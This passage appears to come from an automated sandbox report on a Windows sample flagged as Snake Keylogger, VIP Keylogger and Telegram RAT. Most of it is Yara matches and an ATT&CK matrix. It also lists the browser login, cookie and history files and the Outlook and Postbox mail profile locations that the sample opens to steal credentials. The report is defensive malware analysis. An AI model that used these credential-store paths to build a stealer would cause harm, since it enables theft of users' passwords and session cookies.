Source: C:\Users\user\AppData\Roaming\gJfOOh.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Web\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Web.dll VolumeInformation
Source: C:\Users\user\AppData\Roaming\gJfOOh.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
Source: C:\Users\user\AppData\Roaming\gJfOOh.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation

Source: C:\Users\user\Desktop\VSVy.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Jump to behavior

Stealing of Sensitive Information

Yara detected Snake Keylogger

Source: Yara match	File source: 0000000A.00000002.3902406589.0000000002CF1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000010.00000002.3903689735.0000000002F61000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY

Yara detected Telegram RAT

Source: Yara match	File source: 10.2.VSVy.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 11.2.gJfOOh.exe.3999390.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 11.2.gJfOOh.exe.3955570.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 11.2.gJfOOh.exe.3999390.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.VSVy.exe.447b420.6.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 11.2.gJfOOh.exe.3955570.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.VSVy.exe.43f3000.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.VSVy.exe.41a5dc0.5.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0000000A.00000002.3899379184.0000000000436000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000B.00000002.2436604449.0000000003951000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.2244413359.00000000041A5000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: VSVy.exe PID: 764, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: VSVy.exe PID: 6208, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: gJfOOh.exe PID: 4160, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: gJfOOh.exe PID: 3228, type: MEMORYSTR

Yara detected VIP Keylogger

Source: Yara match	File source: 11.2.gJfOOh.exe.3999390.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 11.2.gJfOOh.exe.3955570.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 11.2.gJfOOh.exe.3999390.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.VSVy.exe.447b420.6.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 11.2.gJfOOh.exe.3955570.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.VSVy.exe.43f3000.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.VSVy.exe.41a5dc0.5.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000010.00000002.3899379679.0000000000435000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000B.00000002.2436604449.0000000003951000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.2244413359.00000000041A5000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: VSVy.exe PID: 764, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: gJfOOh.exe PID: 4160, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: gJfOOh.exe PID: 3228, type: MEMORYSTR

Tries to harvest and steal browser information (history, passwords, etc)

Source: C:\Users\user\AppData\Roaming\gJfOOh.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\History
Source: C:\Users\user\AppData\Roaming\gJfOOh.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\History
Source: C:\Users\user\AppData\Roaming\gJfOOh.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies
Source: C:\Users\user\AppData\Roaming\gJfOOh.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data
Source: C:\Users\user\AppData\Roaming\gJfOOh.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
Source: C:\Users\user\AppData\Roaming\gJfOOh.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data
Source: C:\Users\user\AppData\Roaming\gJfOOh.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Top Sites
Source: C:\Users\user\AppData\Roaming\gJfOOh.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\Cookies

Tries to steal Mail credentials (via file / registry access)

Source: C:\Users\user\Desktop\VSVy.exe	File opened: C:\Users\user\AppData\Roaming\PostboxApp\Profiles\	Jump to behavior
Source: C:\Users\user\Desktop\VSVy.exe	Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676	Jump to behavior
Source: C:\Users\user\AppData\Roaming\gJfOOh.exe	File opened: C:\Users\user\AppData\Roaming\PostboxApp\Profiles\
Source: C:\Users\user\AppData\Roaming\gJfOOh.exe	Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676

Source: Yara match	File source: 10.2.VSVy.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 11.2.gJfOOh.exe.3999390.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 11.2.gJfOOh.exe.3955570.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 11.2.gJfOOh.exe.3999390.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.VSVy.exe.447b420.6.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 11.2.gJfOOh.exe.3955570.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.VSVy.exe.43f3000.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.VSVy.exe.41a5dc0.5.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000010.00000002.3903689735.000000000304D000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000A.00000002.3899379184.0000000000436000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000B.00000002.2436604449.0000000003951000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.2244413359.00000000041A5000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: VSVy.exe PID: 764, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: VSVy.exe PID: 6208, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: gJfOOh.exe PID: 4160, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: gJfOOh.exe PID: 3228, type: MEMORYSTR

Remote Access Functionality

Yara detected Snake Keylogger

Source: Yara match	File source: 0000000A.00000002.3902406589.0000000002CF1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000010.00000002.3903689735.0000000002F61000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY

Yara detected Telegram RAT

Source: Yara match	File source: 10.2.VSVy.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 11.2.gJfOOh.exe.3999390.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 11.2.gJfOOh.exe.3955570.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 11.2.gJfOOh.exe.3999390.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.VSVy.exe.447b420.6.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 11.2.gJfOOh.exe.3955570.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.VSVy.exe.43f3000.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.VSVy.exe.41a5dc0.5.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0000000A.00000002.3899379184.0000000000436000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000B.00000002.2436604449.0000000003951000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.2244413359.00000000041A5000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: VSVy.exe PID: 764, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: VSVy.exe PID: 6208, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: gJfOOh.exe PID: 4160, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: gJfOOh.exe PID: 3228, type: MEMORYSTR

Yara detected VIP Keylogger

Source: Yara match	File source: 11.2.gJfOOh.exe.3999390.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 11.2.gJfOOh.exe.3955570.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 11.2.gJfOOh.exe.3999390.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.VSVy.exe.447b420.6.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 11.2.gJfOOh.exe.3955570.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.VSVy.exe.43f3000.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.VSVy.exe.41a5dc0.5.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000010.00000002.3899379679.0000000000435000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000B.00000002.2436604449.0000000003951000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.2244413359.00000000041A5000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: VSVy.exe PID: 764, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: gJfOOh.exe PID: 4160, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: gJfOOh.exe PID: 3228, type: MEMORYSTR

Mitre Att&ck Matrix

Reconnaissance	Resource Development	Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Command and Control	Exfiltration	Impact
Gather Victim Identity Information	Acquire Infrastructure	Valid Accounts	1 Scheduled Task/Job	1 DLL Side-Loading	1 DLL Side-Loading	11 Disable or Modify Tools	1 OS Credential Dumping	1 File and Directory Discovery	Remote Services	11 Archive Collected Data	1 Web Service	Exfiltration Over Other Network Medium	Abuse Accessibility Features
Credentials	Domains	Default Accounts	Scheduled Task/Job	1 Scheduled Task/Job	111 Process Injection	1 Deobfuscate/Decode Files or Information	LSASS Memory	13 System Information Discovery	Remote Desktop Protocol	1 Data from Local System	3 Ingress Tool Transfer	Exfiltration Over Bluetooth	Network Denial of Service
Email Addresses	DNS Server	Domain Accounts	At	Logon Script (Windows)	1 Scheduled Task/Job	3 Obfuscated Files or Information	Security Account Manager	11 Security Software Discovery	SMB/Windows Admin Shares	1 Email Collection	11 Encrypted Channel	Automated Exfiltration	Data Encrypted for Impact
Employee Names	Virtual Private Server	Local Accounts	Cron	Login Hook	Login Hook	32 Software Packing	NTDS	1 Process Discovery	Distributed Component Object Model	Input Capture	1 Non-Standard Port	Traffic Duplication	Data Destruction
Gather Victim Network Information	Server	Cloud Accounts	Launchd	Network Logon Script	Network Logon Script	1 DLL Side-Loading	LSA Secrets	31 Virtualization/Sandbox Evasion	SSH	Keylogging	3 Non-Application Layer Protocol	Scheduled Transfer	Data Encrypted for Impact
Domain Properties	Botnet	Replication Through Removable Media	Scheduled Task	RC Scripts	RC Scripts	1 Masquerading	Cached Domain Credentials	1 Application Window Discovery	VNC	GUI Input Capture	24 Application Layer Protocol	Data Transfer Size Limits	Service Stop
DNS	Web Services	External Remote Services	Systemd Timers	Startup Items	Startup Items	31 Virtualization/Sandbox Evasion	DCSync	1 System Network Configuration Discovery	Windows Remote Management	Web Portal Capture	Commonly Used Port	Exfiltration Over C2 Channel	Inhibit System Recovery
Network Trust Dependencies	Serverless	Drive-by Compromise	Container Orchestration Job	Scheduled Task/Job	Scheduled Task/Job	111 Process Injection	Proc Filesystem	System Owner/User Discovery	Cloud Services	Credential API Hooking	Application Layer Protocol	Exfiltration Over Alternative Protocol	Defacement

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Screenshots

Thumbnails

This section contains all screenshots as thumbnails, including those not shown in the slideshow.

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report VSVy.exe

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Threat Intel

Malware Configuration

Threatname: VIP Keylogger

Threatname: Snake Keylogger

Yara Signatures

Memory Dumps

Unpacked PEs

Sigma Signatures

System Summary

Persistence and Installation Behavior

Suricata Signatures

Joe Sandbox Signatures

AV Detection

Location Tracking

Compliance

Software Vulnerabilities

Networking

System Summary

Data Obfuscation

Persistence and Installation Behavior

Boot Survival

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Stealing of Sensitive Information

Remote Access Functionality

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Windows Analysis Report
VSVy.exe